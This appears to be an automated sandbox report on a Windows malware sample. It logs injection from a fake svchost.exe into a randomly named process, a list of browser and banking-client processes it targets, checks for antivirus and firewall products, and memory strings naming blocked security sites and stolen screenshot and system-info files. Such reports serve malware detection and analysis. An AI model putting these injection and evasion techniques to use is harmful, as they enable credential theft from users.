Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 7A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 7A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 7A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 7F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: C50000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: C51000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: C52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: CA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1150000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1151000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1152000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 11A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 14E0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 14E1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 14E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1532000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 10D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 10D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 10D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1122000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1130000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1131000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1132000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1182000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: D70000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: D71000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: D72000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: DC2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 860000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 861000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 862000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 8B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1500000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1501000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1502000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1552000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 850000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 851000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 852000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 8A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: D20000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: D21000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: D22000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: D72000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1100000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1101000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1102000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1152000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: A40000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: A41000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: A42000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: A92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1420000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1421000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1422000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 710000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 711000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 712000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 762000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1590000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1591000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1592000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 15E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1140000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1141000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1142000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1192000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C86370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|5_2_01426370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01396370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|10_2_03226370
Source: C:\Users\user\Desktop\WlCVLbzNph.exeFile opened: CA HIPS KmxAgentJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeFile opened: Agnitum Outpost firewal \pipe\acsipc_serverJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeFile opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csiJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeFile opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.datJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeWindow found: AVP NULL ____AVP.RootJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: CA HIPS KmxAgentJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: Agnitum Outpost firewal \pipe\acsipc_serverJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csiJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.datJump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow found: AVP NULL ____AVP.RootJump to behavior
Source: WlCVLbzNph.exe, WlCVLbzNph.exe, 00000000.00000003.1437685155.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, WlCVLbzNph.exe, 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1981123376.000000000F280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: nPtwtzGyOdAtB.exe, 00000005.00000000.1809478098.0000000001860000.00000002.00000001.00040000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000006.00000000.1812790560.00000000017B0000.00000002.00000001.00040000.00000000.sdmp, nPtwtzGyOdAtB.exe, 0000000A.00000000.1820209742.00000000019C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: nPtwtzGyOdAtB.exe, 00000005.00000000.1809478098.0000000001860000.00000002.00000001.00040000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000006.00000000.1812790560.00000000017B0000.00000002.00000001.00040000.00000000.sdmp, nPtwtzGyOdAtB.exe, 0000000A.00000000.1820209742.00000000019C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
Source: nPtwtzGyOdAtB.exe, 00000005.00000000.1809478098.0000000001860000.00000002.00000001.00040000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000006.00000000.1812790560.00000000017B0000.00000002.00000001.00040000.00000000.sdmp, nPtwtzGyOdAtB.exe, 0000000A.00000000.1820209742.00000000019C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: WlCVLbzNph.exe, 00000000.00000003.1437685155.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, WlCVLbzNph.exe, 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, svchost.exe, 00000002.00000003.1981123376.000000000F280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%sMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3\*.*...\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xc:\windowsc:\windows\explorer.exeShell_TrayWnd
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00412FF0 cpuid 0_2_00412FF0
Source: C:\Windows\apppatch\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\6d1da670\debug_11;Nov;2024_12;31;11.log VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\6d1da670\scr.bmp VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\6d1da670\sysinfo.log VolumeInformationJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeQueries volume information: C:\ VolumeInformation
